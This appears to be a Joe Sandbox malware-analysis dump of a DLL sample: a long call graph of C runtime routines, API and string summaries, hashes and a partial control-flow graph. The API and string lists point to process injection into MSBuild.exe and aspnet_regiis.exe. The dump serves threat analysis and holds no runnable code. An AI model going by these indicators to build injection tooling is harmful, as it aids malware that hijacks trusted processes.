11969->11970 11971 6ce245b8 TlsGetValue 11969->11971 11970->11949 11973 6ce24421 __dosmaperr 5 API calls 11972->11973 11974 6ce245dc 11973->11974 11975 6ce229c9 11974->11975 11976 6ce245fa TlsSetValue 11974->11976 11975->11950 11975->11966 11995 6ce224cd 11977->11995 11983 6ce2444b __dosmaperr 11982->11983 11984 6ce2444f 11982->11984 11983->11969 11984->11983 11988 6ce2435a 11984->11988 11987 6ce24469 GetProcAddress 11987->11983 11993 6ce2436b ___vcrt_FlsGetValue 11988->11993 11989 6ce24389 LoadLibraryExW 11990 6ce243a4 GetLastError 11989->11990 11989->11993 11990->11993 11991 6ce243ff FreeLibrary 11991->11993 11992 6ce24416 11992->11983 11992->11987 11993->11989 11993->11991 11993->11992 11994 6ce243d7 LoadLibraryExW 11993->11994 11994->11993 11996 6ce224d9 ___scrt_is_nonwritable_in_current_image 11995->11996 12009 6ce22aca EnterCriticalSection 11996->12009 11998 6ce224e3 12010 6ce22513 11998->12010 12001 6ce225df 12002 6ce225eb ___scrt_is_nonwritable_in_current_image 12001->12002 12014 6ce22aca EnterCriticalSection 12002->12014 12004 6ce225f5 12015 6ce227c0 12004->12015 12006 6ce2260d 12019 6ce2262d 12006->12019 12009->11998 12013 6ce22b12 LeaveCriticalSection 12010->12013 12012 6ce22501 12012->12001 12013->12012 12014->12004 12016 6ce227f6 __dosmaperr 12015->12016 12017 6ce227cf __dosmaperr 12015->12017 12016->12006 12017->12016 12022 6ce25518 12017->12022 12136 6ce22b12 LeaveCriticalSection 12019->12136 12021 6ce2261b 12021->11965 12024 6ce25598 12022->12024 12025 6ce2552e 12022->12025 12027 6ce22e33 _free 14 API calls 12024->12027 12048 6ce255e6 12024->12048 12025->12024 12031 6ce25561 12025->12031 12033 6ce22e33 _free 14 API calls 12025->12033 12026 6ce255f4 12037 6ce25654 12026->12037 12044 6ce22e33 14 API calls _free 12026->12044 12028 6ce255ba 12027->12028 12029 6ce22e33 _free 14 API calls 12028->12029 12030 6ce255cd 12029->12030 12034 6ce22e33 _free 14 API calls 12030->12034 12035 6ce22e33 _free 14 API calls 12031->12035 12049 6ce25583 12031->12049 12032 6ce22e33 _free 14 API calls 12036 6ce2558d 12032->12036 12038 6ce25556 12033->12038 12039 6ce255db 12034->12039 12040 6ce25578 12035->12040 12041 6ce22e33 _free 14 API calls 12036->12041 12042 6ce22e33 _free 14 API calls 12037->12042 12050 6ce27448 12038->12050 12045 6ce22e33 _free 14 API calls 12039->12045 12078 6ce27546 12040->12078 12041->12024 12047 6ce2565a 12042->12047 12044->12026 12045->12048 12047->12016 12090 6ce25689 12048->12090 12049->12032 12051 6ce27459 12050->12051 12077 6ce27542 12050->12077 12052 6ce2746a 12051->12052 12053 6ce22e33 _free 14 API calls 12051->12053 12054 6ce2747c 12052->12054 12055 6ce22e33 _free 14 API calls 12052->12055 12053->12052 12056 6ce2748e 12054->12056 12058 6ce22e33 _free 14 API calls 12054->12058 12055->12054 12057 6ce274a0 12056->12057 12059 6ce22e33 _free 14 API calls 12056->12059 12060 6ce274b2 12057->12060 12061 6ce22e33 _free 14 API calls 12057->12061 12058->12056 12059->12057 12062 6ce274c4 12060->12062 12063 6ce22e33 _free 14 API calls 12060->12063 12061->12060 12064 6ce274d6 12062->12064 12066 6ce22e33 _free 14 API calls 12062->12066 12063->12062 12065 6ce274e8 12064->12065 12067 6ce22e33 _free 14 API calls 12064->12067 12068 6ce274fa 12065->12068 12069 6ce22e33 _free 14 API calls 12065->12069 12066->12064 12067->12065 12070 6ce2750c 12068->12070 12071 6ce22e33 _free 14 API calls 12068->12071 12069->12068 12072 6ce2751e 12070->12072 12073 6ce22e33 _free 14 API calls 12070->12073 12071->12070 12074 6ce22e33 _free 14 API calls 12072->12074 12075 6ce27530 12072->12075 12073->12072 12074->12075 12076 6ce22e33 _free 14 API calls 12075->12076 12075->12077 12076->12077 12077->12031 12079 6ce27553 12078->12079 12080 6ce275ab 12078->12080 12081 6ce27563 12079->12081 12083 6ce22e33 _free 14 API calls 12079->12083 12080->12049 12082 6ce27575 12081->12082 12084 6ce22e33 _free 14 API calls 12081->12084 12085 6ce27587 12082->12085 12086 6ce22e33 _free 14 API calls 12082->12086 12083->12081 12084->12082 12087 6ce27599 12085->12087 12088 6ce22e33 _free 14 API calls 12085->12088 12086->12085 12087->12080 12089 6ce22e33 _free 14 API calls 12087->12089 12088->12087 12089->12080 12091 6ce25696 12090->12091 12092 6ce256b5 12090->12092 12091->12092 12096 6ce275e7 12091->12096 12092->12026 12095 6ce22e33 _free 14 API calls 12095->12092 12097 6ce256af 12096->12097 12098 6ce275f8 12096->12098 12097->12095 12132 6ce275af 12098->12132 12101 6ce275af __dosmaperr 14 API calls 12102 6ce2760b 12101->12102 12103 6ce275af __dosmaperr 14 API calls 12102->12103 12104 6ce27616 12103->12104 12105 6ce275af __dosmaperr 14 API calls 12104->12105 12106 6ce27621 12105->12106 12107 6ce275af __dosmaperr 14 API calls 12106->12107 12108 6ce2762f 12107->12108 12109 6ce22e33 _free 14 API calls 12108->12109 12110 6ce2763a 12109->12110 12111 6ce22e33 _free 14 API calls 12110->12111 12112 6ce27645 12111->12112 12113 6ce22e33 _free 14 API calls 12112->12113 12114 6ce27650 12113->12114 12115 6ce275af __dosmaperr 14 API calls 12114->12115 12116 6ce2765e 12115->12116 12117 6ce275af __dosmaperr 14 API calls 12116->12117 12118 6ce2766c 12117->12118 12119 6ce275af __dosmaperr 14 API calls 12118->12119 12120 6ce2767d 12119->12120 12121 6ce275af __dosmaperr 14 API calls 12120->12121 12122 6ce2768b 12121->12122 12123 6ce275af __dosmaperr 14 API calls 12122->12123 12124 6ce27699 12123->12124 12125 6ce22e33 _free 14 API calls 12124->12125 12126 6ce276a4 12125->12126 12127 6ce22e33 _free 14 API calls 12126->12127 12128 6ce276af 12127->12128 12129 6ce22e33 _free 14 API calls 12128->12129 12130 6ce276ba 12129->12130 12131 6ce22e33 _free 14 API calls 12130->12131 12131->12097 12133 6ce275e2 12132->12133 12134 6ce275d2 12132->12134 12133->12101 12134->12133 12135 6ce22e33 _free 14 API calls 12134->12135 12135->12134 12136->12021 12137 6ce1fcce 12138 6ce1fcd7 12137->12138 12139 6ce1fcdc 12137->12139 12158 6ce1fe60 12138->12158 12143 6ce1fb98 12139->12143 12144 6ce1fba4 ___scrt_is_nonwritable_in_current_image 12143->12144 12145 6ce1fbcd dllmain_raw 12144->12145 12146 6ce1fbc8 12144->12146 12154 6ce1fbb3 12144->12154 12147 6ce1fbe7 dllmain_crt_dispatch 12145->12147 12145->12154 12162 6ce1ed30 12146->12162 12147->12146 12147->12154 12150 6ce1fc39 12151 6ce1fc42 dllmain_crt_dispatch 12150->12151 12150->12154 12152 6ce1fc55 dllmain_raw 12151->12152 12151->12154 12152->12154 12153 6ce1ed30 __DllMainCRTStartup@12 5 API calls 12155 6ce1fc20 12153->12155 12166 6ce1fae8 12155->12166 12157 6ce1fc2e dllmain_raw 12157->12150 12159 6ce1fe76 12158->12159 12161 6ce1fe7f 12159->12161 12416 6ce1fe13 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12159->12416 12161->12139 12163 6ce1ed94 12162->12163 12164 6ce1f980 _ValidateLocalCookies 5 API calls 12163->12164 12165 6ce1f815 12164->12165 12165->12150 12165->12153 12167 6ce1faf4 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 12166->12167 12168 6ce1fafd 12167->12168 12169 6ce1fb90 12167->12169 12170 6ce1fb25 12167->12170 12168->12157 12214 6ce201ca IsProcessorFeaturePresent 12169->12214 12193 6ce1fffb 12170->12193 12173 6ce1fb2a 12202 6ce1feb7 12173->12202 12175 6ce1fb97 ___scrt_is_nonwritable_in_current_image 12177 6ce1fbcd dllmain_raw 12175->12177 12178 6ce1fbc8 12175->12178 12189 6ce1fbb3 12175->12189 12176 6ce1fb2f __RTC_Initialize __DllMainCRTStartup@12 12205 6ce2019c 12176->12205 12179 6ce1fbe7 dllmain_crt_dispatch 12177->12179 12177->12189 12182 6ce1ed30 __DllMainCRTStartup@12 5 API calls 12178->12182 12179->12178 12179->12189 12184 6ce1fc08 12182->12184 12185 6ce1fc39 12184->12185 12188 6ce1ed30 __DllMainCRTStartup@12 5 API calls 12184->12188 12186 6ce1fc42 dllmain_crt_dispatch 12185->12186 12185->12189 12187 6ce1fc55 dllmain_raw 12186->12187 12186->12189 12187->12189 12190 6ce1fc20 12188->12190 12189->12157 12191 6ce1fae8 __DllMainCRTStartup@12 79 API calls 12190->12191 12192 6ce1fc2e dllmain_raw 12191->12192 12192->12185 12194 6ce20000 ___scrt_release_startup_lock 12193->12194 12195 6ce20004 12194->12195 12197 6ce20010 __DllMainCRTStartup@12 12194->12197 12218 6ce2208e 12195->12218 12199 6ce2001d 12197->12199 12221 6ce218f1 12197->12221 12199->12173 12288 6ce20e2e InterlockedFlushSList 12202->12288 12206 6ce201a8 12205->12206 12207 6ce1fb4e 12206->12207 12295 6ce22226 12206->12295 12211 6ce1fb8a 12207->12211 12209 6ce201b6 12300 6ce20e86 12209->12300 12399 6ce2001e 12211->12399 12215 6ce201e0 __DllMainCRTStartup@12 12214->12215 12216 6ce2028b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12215->12216 12217 6ce202d6 __DllMainCRTStartup@12 12216->12217 12217->12175 12232 6ce21f59 12218->12232 12222 6ce218ff 12221->12222 12230 6ce21910 12221->12230 12249 6ce21997 GetModuleHandleW 12222->12249 12227 6ce2194a 12227->12173 12256 6ce217b7 12230->12256 12233 6ce21f65 ___scrt_is_nonwritable_in_current_image 12232->12233 12240 6ce22aca EnterCriticalSection 12233->12240 12235 6ce21f73 12241 6ce21fb4 12235->12241 12240->12235 12242 6ce21f80 12241->12242 12243 6ce21fd3 12241->12243 12245 6ce21fa8 12242->12245 12243->12242 12244 6ce22e33 _free 14 API calls 12243->12244 12244->12242 12248 6ce22b12 LeaveCriticalSection 12245->12248 12247 6ce2000e 12247->12173 12248->12247 12250 6ce21904 12249->12250 12250->12230 12251 6ce219da GetModuleHandleExW 12250->12251 12252 6ce219f9 GetProcAddress 12251->12252 12255 6ce21a0e 12251->12255 12252->12255 12253 6ce21a22 FreeLibrary 12254 6ce21a2b 12253->12254 12254->12230 12255->12253 12255->12254 12257 6ce217c3 ___scrt_is_nonwritable_in_current_image 12256->12257 12272 6ce22aca EnterCriticalSection 12257->12272 12259 6ce217cd 12273 6ce21804 12259->12273 12261 6ce217da 12277 6ce217f8 12261->12277 12264 6ce21955 12281 6ce22b29 GetPEB 12264->12281 12267 6ce21984 12270 6ce219da __DllMainCRTStartup@12 3 API calls 12267->12270 12268 6ce21964 GetPEB 12268->12267 12269 6ce21974 GetCurrentProcess TerminateProcess 12268->12269 12269->12267 12271 6ce2198c ExitProcess 12270->12271 12272->12259 12274 6ce21810 ___scrt_is_nonwritable_in_current_image 12273->12274 12275 6ce2208e __DllMainCRTStartup@12 14 API calls 12274->12275 12276 6ce21871 __DllMainCRTStartup@12 12274->12276 12275->12276 12276->12261 12280 6ce22b12 LeaveCriticalSection 12277->12280 12279 6ce217e6 12279->12227 12279->12264 12280->12279 12282 6ce22b43 12281->12282 12284 6ce2195f 12281->12284 12285 6ce244a4 12282->12285 12284->12267 12284->12268 12286 6ce24421 __dosmaperr 5 API calls 12285->12286 12287 6ce244c0 12286->12287 12287->12284 12289 6ce20e3e 12288->12289 12290 6ce1fec1 12288->12290 12289->12290 12292 6ce222a4 12289->12292 12290->12176 12293 6ce22e33 _free 14 API calls 12292->12293 12294 6ce222bc 12293->12294 12294->12289 12296 6ce22231 12295->12296 12298 6ce22243 ___scrt_uninitialize_crt 12295->12298 12297 6ce2223f 12296->12297 12306 6ce25067 12296->12306 12297->12209 12298->12209 12301 6ce20e99 12300->12301 12302 6ce20e8f 12300->12302 12301->12207 12372 6ce2126c 12302->12372 12309 6ce24f15 12306->12309 12312 6ce24e69 12309->12312 12313 6ce24e75 ___scrt_is_nonwritable_in_current_image 12312->12313 12320 6ce22aca EnterCriticalSection 12313->12320 12315 6ce24eeb 12329 6ce24f09 12315->12329 12318 6ce24e7f ___scrt_uninitialize_crt 12318->12315 12321 6ce24ddd 12318->12321 12320->12318 12322 6ce24de9 ___scrt_is_nonwritable_in_current_image 12321->12322 12332 6ce25184 EnterCriticalSection 12322->12332 12324 6ce24e2c 12343 6ce24e5d 12324->12343 12325 6ce24df3 ___scrt_uninitialize_crt 12325->12324 12333 6ce2501f 12325->12333 12371 6ce22b12 LeaveCriticalSection 12329->12371 12331 6ce24ef7 12331->12297 12332->12325 12334 6ce25035 12333->12334 12335 6ce2502c 12333->12335 12346 6ce24fba 12334->12346 12336 6ce24f15 ___scrt_uninitialize_crt 66 API calls 12335->12336 12338 6ce25032 12336->12338 12338->12324 12341 6ce25051 12359 6ce26683 12341->12359 12370 6ce25198 LeaveCriticalSection 12343->12370 12345 6ce24e4b 12345->12318 12347 6ce24fd2 12346->12347 12348 6ce24ff7 12346->12348 12347->12348 12349 6ce253b0 ___scrt_uninitialize_crt 25 API calls 12347->12349 12348->12338 12352 6ce253b0 12348->12352 12350 6ce24ff0 12349->12350 12351 6ce26e7b ___scrt_uninitialize_crt 62 API calls 12350->12351 12351->12348 12353 6ce253d1 12352->12353 12354 6ce253bc 12352->12354 12353->12341 12355 6ce22dc3 __dosmaperr 14 API calls 12354->12355 12356 6ce253c1 12355->12356 12357 6ce22d06 __fassign 25 API calls 12356->12357 12358 6ce253cc 12357->12358 12358->12341 12360 6ce266a1 12359->12360 12361 6ce26694 12359->12361 12363 6ce266ea 12360->12363 12365 6ce266c8 12360->12365 12362 6ce22dc3 __dosmaperr 14 API calls 12361->12362 12368 6ce26699 12362->12368 12364 6ce22dc3 __dosmaperr 14 API calls 12363->12364 12366 6ce266ef 12364->12366 12369 6ce265e1 ___scrt_uninitialize_crt 29 API calls 12365->12369 12367 6ce22d06 __fassign 25 API calls 12366->12367 12367->12368 12368->12338 12369->12368 12370->12345 12371->12331 12373 6ce21276 12372->12373 12374 6ce20e94 12372->12374 12380 6ce21441 12373->12380 12376 6ce212c3 12374->12376 12377 6ce212ce 12376->12377 12379 6ce212ed 12376->12379 12378 6ce212d8 DeleteCriticalSection 12377->12378 12378->12378 12378->12379 12379->12301 12385 6ce213bd 12380->12385 12383 6ce21473 TlsFree 12384 6ce21467 12383->12384 12384->12374 12386 6ce213f8 12385->12386 12387 6ce213d5 12385->12387 12386->12383 12386->12384 12387->12386 12391 6ce21323 12387->12391 12390 6ce213ea GetProcAddress 12390->12386 12396 6ce2132f ___vcrt_FlsGetValue 12391->12396 12392 6ce213a3 12392->12386 12392->12390 12393 6ce21345 LoadLibraryExW 12394 6ce21363 GetLastError 12393->12394 12395 6ce213aa 12393->12395 12394->12396 12395->12392 12397 6ce213b2 FreeLibrary 12395->12397 12396->12392 12396->12393 12398 6ce21385 LoadLibraryExW 12396->12398 12397->12392 12398->12395 12398->12396 12404 6ce22256 12399->12404 12402 6ce2126c ___vcrt_uninitialize_ptd 6 API calls 12403 6ce1fb8f 12402->12403 12403->12168 12407 6ce22a6f 12404->12407 12408 6ce20025 12407->12408 12409 6ce22a79 12407->12409 12408->12402 12411 6ce24542 12409->12411 12412 6ce24421 __dosmaperr 5 API calls 12411->12412 12413 6ce2455e 12412->12413 12414 6ce24579 TlsFree 12413->12414 12415 6ce24567 12413->12415 12415->12408 12416->12161 12417 6ce1f98e 12418 6ce1f999 12417->12418 12419 6ce1f9cc 12417->12419 12421 6ce1f9be 12418->12421 12422 6ce1f99e 12418->12422 12420 6ce1fae8 __DllMainCRTStartup@12 84 API calls 12419->12420 12428 6ce1f9a8 12420->12428 12429 6ce1f9e1 12421->12429 12424 6ce1f9a3 12422->12424 12425 6ce1f9b4 12422->12425 12424->12428 12443 6ce1ffba 12424->12443 12448 6ce1ff9b 12425->12448 12430 6ce1f9ed ___scrt_is_nonwritable_in_current_image 12429->12430 12456 6ce2002b 12430->12456 12432 6ce1f9f4 __DllMainCRTStartup@12 12433 6ce1fae0 12432->12433 12434 6ce1fa1b 12432->12434 12440 6ce1fa57 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 12432->12440 12436 6ce201ca __DllMainCRTStartup@12 4 API calls 12433->12436 12467 6ce1ff8d 12434->12467 12437 6ce1fae7 12436->12437 12438 6ce1fa2a __RTC_Initialize 12438->12440 12470 6ce1feab InitializeSListHead 12438->12470 12440->12428 12441 6ce1fa38 12441->12440 12471 6ce1ff62 12441->12471 12532 6ce2221e 12443->12532 12621 6ce20e70 12448->12621 12453 6ce1ffb7 12453->12428 12454 6ce20e7b 21 API calls 12455 6ce1ffa4 12454->12455 12455->12428 12457 6ce20034 12456->12457 12475 6ce20398 IsProcessorFeaturePresent 12457->12475 12461 6ce20045 12462 6ce20049 12461->12462 12485 6ce22201 12461->12485 12462->12432 12465 6ce20060 12465->12432 12466 6ce20e86 ___scrt_uninitialize_crt 7 API calls 12466->12462 12526 6ce20064 12467->12526 12469 6ce1ff94 12469->12438 12470->12441 12472 6ce1ff67 ___scrt_release_startup_lock 12471->12472 12473 6ce20398 IsProcessorFeaturePresent 12472->12473 12474 6ce1ff70 12472->12474 12473->12474 12474->12440 12476 6ce20040 12475->12476 12477 6ce20e51 12476->12477 12488 6ce21287 12477->12488 12480 6ce20e5a 12480->12461 12482 6ce20e62 12483 6ce20e6d 12482->12483 12484 6ce212c3 ___vcrt_uninitialize_locks DeleteCriticalSection 12482->12484 12483->12461 12484->12480 12517 6ce2494d 12485->12517 12489 6ce21290 12488->12489 12491 6ce212b9 12489->12491 12493 6ce20e56 12489->12493 12502 6ce214f5 12489->12502 12492 6ce212c3 ___vcrt_uninitialize_locks DeleteCriticalSection 12491->12492 12492->12493 12493->12480 12494 6ce21239 12493->12494 12507 6ce21406 12494->12507 12499 6ce21269 12499->12482 12500 6ce2126c ___vcrt_uninitialize_ptd 6 API calls 12501 6ce2124e 12500->12501 12501->12482 12503 6ce213bd ___vcrt_FlsGetValue 5 API calls 12502->12503 12504 6ce2150f 12503->12504 12505 6ce2152d InitializeCriticalSectionAndSpinCount 12504->12505 12506 6ce21518 12504->12506 12505->12506 12506->12489 12508 6ce213bd ___vcrt_FlsGetValue 5 API calls 12507->12508 12509 6ce21420 12508->12509 12510 6ce21439 TlsAlloc 12509->12510 12511 6ce21243 12509->12511 12511->12501 12512 6ce214b7 12511->12512 12513 6ce213bd ___vcrt_FlsGetValue 5 API calls 12512->12513 12514 6ce214d1 12513->12514 12515 6ce214ec TlsSetValue 12514->12515 12516 6ce2125c 12514->12516 12515->12516 12516->12499 12516->12500 12518 6ce20052 12517->12518 12519 6ce2495d 12517->12519 12518->12465 12518->12466 12519->12518 12521 6ce2480d 12519->12521 12522 6ce24814 12521->12522 12523 6ce24857 GetStdHandle 12522->12523 12524 6ce248bd 12522->12524 12525 6ce2486a GetFileType 12522->12525 12523->12522 12524->12519 12525->12522 12527 6ce20070 12526->12527 12528 6ce20074 12526->12528 12527->12469 12529 6ce201ca __DllMainCRTStartup@12 4 API calls 12528->12529 12531 6ce20081 ___scrt_release_startup_lock 12528->12531 12530 6ce200ea 12529->12530 12531->12469 12538 6ce2280b 12532->12538 12535 6ce20e7b 12604 6ce21163 12535->12604 12539 6ce1ffbf 12538->12539 12540 6ce22815 12538->12540 12539->12535 12541 6ce24581 __dosmaperr 6 API calls 12540->12541 12542 6ce2281c 12541->12542 12542->12539 12543 6ce245c0 __dosmaperr 6 API calls 12542->12543 12544 6ce2282f 12543->12544 12546 6ce226d2 12544->12546 12547 6ce226ed 12546->12547 12548 6ce226dd 12546->12548 12547->12539 12552 6ce226f3 12548->12552 12551 6ce22e33 _free 14 API calls 12551->12547 12553 6ce2270e 12552->12553 12554 6ce22708 12552->12554 12556 6ce22e33 _free 14 API calls 12553->12556 12555 6ce22e33 _free 14 API calls 12554->12555 12555->12553 12557 6ce2271a 12556->12557 12558 6ce22e33 _free 14 API calls 12557->12558 12559 6ce22725 12558->12559 12560 6ce22e33 _free 14 API calls 12559->12560 12561 6ce22730 12560->12561 12562 6ce22e33 _free 14 API calls 12561->12562 12563 6ce2273b 12562->12563 12564 6ce22e33 _free 14 API calls 12563->12564 12565 6ce22746 12564->12565 12566 6ce22e33 _free 14 API calls 12565->12566 12567 6ce22751 12566->12567 12568 6ce22e33 _free 14 API calls 12567->12568 12569 6ce2275c 12568->12569 12570 6ce22e33 _free 14 API calls 12569->12570 12571 6ce22767 12570->12571 12572 6ce22e33 _free 14 API calls 12571->12572 12573 6ce22775 12572->12573 12578 6ce2251f 12573->12578 12579 6ce2252b ___scrt_is_nonwritable_in_current_image 12578->12579 12594 6ce22aca EnterCriticalSection 12579->12594 12581 6ce2255f 12595 6ce2257e 12581->12595 12583 6ce22535 12583->12581 12585 6ce22e33 _free 14 API calls 12583->12585 12585->12581 12586 6ce2258a 12587 6ce22596 ___scrt_is_nonwritable_in_current_image 12586->12587 12599 6ce22aca EnterCriticalSection 12587->12599 12589 6ce225a0 12590 6ce227c0 __dosmaperr 14 API calls 12589->12590 12591 6ce225b3 12590->12591 12600 6ce225d3 12591->12600 12594->12583 12598 6ce22b12 LeaveCriticalSection 12595->12598 12597 6ce2256c 12597->12586 12598->12597 12599->12589 12603 6ce22b12 LeaveCriticalSection 12600->12603 12602 6ce225c1 12602->12551 12603->12602 12605 6ce21170 12604->12605 12606 6ce1ffc4 12604->12606 12607 6ce2117e 12605->12607 12612 6ce2147c 12605->12612 12606->12428 12609 6ce214b7 ___vcrt_FlsSetValue 6 API calls 12607->12609 12610 6ce2118e 12609->12610 12617 6ce21147 12610->12617 12613 6ce213bd ___vcrt_FlsGetValue 5 API calls 12612->12613 12614 6ce21496 12613->12614 12615 6ce214ae TlsGetValue 12614->12615 12616 6ce214a2 12614->12616 12615->12616 12616->12607 12618 6ce21151 12617->12618 12620 6ce2115e 12617->12620 12619 6ce222a4 ___vcrt_freefls@4 14 API calls 12618->12619 12618->12620 12619->12620 12620->12606 12627 6ce211a7 12621->12627 12623 6ce1ffa0 12623->12455 12624 6ce22213 12623->12624 12625 6ce2298e __dosmaperr 14 API calls 12624->12625 12626 6ce1ffac 12625->12626 12626->12453 12626->12454 12628 6ce211b3 GetLastError 12627->12628 12629 6ce211b0 12627->12629 12630 6ce2147c ___vcrt_FlsGetValue 6 API calls 12628->12630 12629->12623 12631 6ce211c8 12630->12631 12632 6ce2122d SetLastError 12631->12632 12633 6ce214b7 ___vcrt_FlsSetValue 6 API calls 12631->12633 12640 6ce211e7 12631->12640 12632->12623 12635 6ce211e1 12633->12635 12634 6ce21209 12637 6ce214b7 ___vcrt_FlsSetValue 6 API calls 12634->12637 12638 6ce2121d 12634->12638 12635->12634 12636 6ce214b7 ___vcrt_FlsSetValue 6 API calls 12635->12636 12635->12640 12636->12634 12637->12638 12639 6ce222a4 ___vcrt_freefls@4 14 API calls 12638->12639 12639->12640 12640->12632
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Memory$Write$Thread$Context$AllocateCloseCreateHandleReadResumeWindow$AllocConsoleProcessShow
                                                                                              • String ID: .#}$$0g5$>D?t$>D?t$@$@?Z-$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$^$d8j)$d8j)$kernel32.dll$ntdll.dll$z$$K?H
                                                                                              • API String ID: 2455923772-2427965612
                                                                                              • Opcode ID: f05251c8b101c07b091ba2dbcae51d4d6bf002c0742415117905057775a28924
                                                                                              • Instruction ID: 0ba8952925f574a3fdfb4e2054c91b73f1051487a814609668027a3ab692fe0c
                                                                                              • Opcode Fuzzy Hash: f05251c8b101c07b091ba2dbcae51d4d6bf002c0742415117905057775a28924
                                                                                              • Instruction Fuzzy Hash: 09B31F36B192158FCB18CE3CD9D43D93BF2AB47354F219199E419DBBA0C6359E8A8F40
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Handle$CloseCreate$ModuleProtectViewVirtual$Mapping$InformationName
                                                                                              • String ID: ![6s$![6s$6,LQ$6,LQ$@$Bc}s$H-RS$H-RS$KCp>$KGT$dZU5$hVf}$iR%$wzc$$v$$v
                                                                                              • API String ID: 3643185851-3117542509
                                                                                              • Opcode ID: 2f228368b644a9bdc55271f4c1f39b09ed9748a4890ef037cf468c2d33a58e42
                                                                                              • Instruction ID: cfad85a1845f422d6941b330dc8cbd42543bcbe6b83d9bfdd9931deafc2ad8dc
                                                                                              • Opcode Fuzzy Hash: 2f228368b644a9bdc55271f4c1f39b09ed9748a4890ef037cf468c2d33a58e42
                                                                                              • Instruction Fuzzy Hash: 83630136B092108FDB14CEBCC9947DD77F2AB47354F209659D41ADBB94C23A8A4ACF12

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1451 6ce17960-6ce179aa 1452 6ce179b1-6ce179bc 1451->1452 1453 6ce179c2-6ce179cf 1452->1453 1454 6ce180d4-6ce18142 1452->1454 1457 6ce17d83-6ce17d8a 1453->1457 1458 6ce179d5-6ce179e2 1453->1458 1455 6ce18723 1454->1455 1455->1452 1457->1455 1460 6ce17d23-6ce17d7e 1458->1460 1461 6ce179e8-6ce179f5 1458->1461 1460->1455 1463 6ce186fb-6ce1870b 1461->1463 1464 6ce179fb-6ce17a08 1461->1464 1463->1455 1466 6ce1861d-6ce18627 1464->1466 1467 6ce17a0e-6ce17a1b 1464->1467 1466->1455 1469 6ce17a21-6ce17a2e 1467->1469 1470 6ce18147-6ce181bd 1467->1470 1472 6ce17a34-6ce17a41 1469->1472 1473 6ce1848b-6ce184d4 1469->1473 1470->1455 1475 6ce17a47-6ce17a54 1472->1475 1476 6ce182ad-6ce1831b 1472->1476 1473->1455 1478 6ce180a4-6ce180ba 1475->1478 1479 6ce17a5a-6ce17a67 1475->1479 1476->1455 1478->1455 1481 6ce17e50-6ce17ebe 1479->1481 1482 6ce17a6d-6ce17a7a 1479->1482 1481->1455 1484 6ce18611-6ce18618 1482->1484 1485 6ce17a80-6ce17a8d 1482->1485 1484->1455 1487 6ce17a93-6ce17aa0 1485->1487 1488 6ce17f3f-6ce17f46 1485->1488 1490 6ce17aa6-6ce17ab3 1487->1490 1491 6ce1828d-6ce18294 1487->1491 1488->1455 1493 6ce17ab9-6ce17ac6 1490->1493 1494 6ce18558-6ce18599 1490->1494 1491->1455 1496 6ce181c2-6ce181c9 1493->1496 1497 6ce17acc-6ce17ad9 1493->1497 1494->1455 1496->1455 1499 6ce1837a-6ce183c3 1497->1499 1500 6ce17adf-6ce17aec 1497->1500 1499->1455 1502 6ce17af2-6ce17aff 1500->1502 1503 6ce1859e-6ce1860c 1500->1503 1505 6ce18470-6ce1848a call 6ce1f980 1502->1505 1506 6ce17b05-6ce17b12 1502->1506 1503->1455 1509 6ce184d9-6ce18547 1506->1509 1510 6ce17b18-6ce17b25 1506->1510 1509->1455 1513 6ce18320-6ce18369 1510->1513 1514 6ce17b2b-6ce17b38 1510->1514 1513->1455 1516 6ce17d8f-6ce17dd8 1514->1516 1517 6ce17b3e-6ce17b4b 1514->1517 1516->1455 1519 6ce17b51-6ce17b5e 1517->1519 1520 6ce17f4b-6ce17f8c 1517->1520 1522 6ce186e0-6ce186ea 1519->1522 1523 6ce17b64-6ce17b71 1519->1523 1520->1455 1522->1455 1525 6ce17b77-6ce17b84 1523->1525 1526 6ce17ddd-6ce17e4b 1523->1526 1528 6ce17ec3-6ce17f3a 1525->1528 1529 6ce17b8a-6ce17b97 1525->1529 1526->1455 1528->1455 1531 6ce17b9d-6ce17baa 1529->1531 1532 6ce1862c-6ce18633 1529->1532 1534 6ce17bb0-6ce17bbd 1531->1534 1535 6ce18299-6ce182a8 1531->1535 1532->1455 1537 6ce17bc3-6ce17bd0 1534->1537 1538 6ce180bf-6ce180cf 1534->1538 1535->1455 1540 6ce17bd6-6ce17be3 1537->1540 1541 6ce1807e-6ce18085 1537->1541 1538->1455 1543 6ce18444-6ce1844b 1540->1543 1544 6ce17be9-6ce17bf6 